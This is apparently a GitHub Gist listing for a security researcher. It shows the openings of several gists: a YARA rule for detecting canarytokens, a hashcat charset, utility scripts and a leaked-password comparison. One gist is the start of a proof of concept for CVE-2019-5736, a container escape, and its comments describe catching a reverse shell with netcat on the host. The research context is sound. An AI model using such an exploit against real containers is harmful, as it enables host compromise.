@singe
singe / README.md
Last active Jul 8, 2021
Canarytoken'ed Word .docx yara rule

Remember to unzip the .docx first, or use scan.sh.

Compile the yara rule for scan.sh to work: yarac canarytoken.yar canarytoken

@singe
singe / sources.md
Last active Sep 28, 2020
Richard Serra & Carlota Fay Schoolman's "Television Delivers People" from March 1973
@singe
singe / README.md
Last active Sep 24, 2020
Windows Arabic Code Page (1265) for hashcat

A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.

@singe
singe / Dockerfile
Last active May 29, 2020
Simple canary token binary wrapper
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@singe
singe / create_certs.sh
Last active Jul 18, 2021
A simple tshark EAP certificate extractor
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / cve-2019-5736.py
Last active Apr 16, 2021
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / xe.sh
Created May 8, 2018
A super simple script to pull currency info from xe.com
#!/bin/sh
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
url="https://www.xe.com/currencyconverter/convert/"
amount="$1"
fromcur="$2"
tocur="$3"
if [ "$fromcur" = "" ]; then # Use default currencies (POSIX sh: "=" not "==")
fromcur="ZAR"
tocur="GBP"
fi
@singe
singe / allowed.txt
Last active May 28, 2019
LinkedIn Top 10k Passwords Compared to Twitter Password Blacklist
123456789:allowed
linkedin:allowed
000000:allowed
linked:allowed
1234567890:allowed
222222:allowed
555555:allowed
pakistan:allowed
chocolate:allowed
Linkedin:allowed
@singe
singe / docker-for-mac-linuxkit-build.sh
Created Mar 14, 2018
A simple script to rebuild the linuxkit image used in Docker for Mac.
git clone https://github.com/linuxkit/linuxkit
cd linuxkit
currdir=$(pwd)
make
export PATH=$PATH:$currdir/bin
foo=$(grep isoEfi\ $currdir/src/cmd/linuxkit/vendor/github.com/moby/tool/src/moby/output.go|cut -d\" -f2)
docker pull $foo
cd examples
linuxkit build --format iso-efi docker-for-mac.yml
mv /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso.orig
@singe
singe / request-proxy-facebook.py
Last active Jul 13, 2020
Simple Python requests to browser reverse proxy example.
#!/usr/bin/env python3
# A simple demo of Python requests to reverse proxy
# It's an intermediate between vanilla requests and Selenium
# It lets you interact programmatically, but still run JS in
# the browser, without Selenium overhead
#
# This is an example of automating aspects of Facebook
#
# by @singe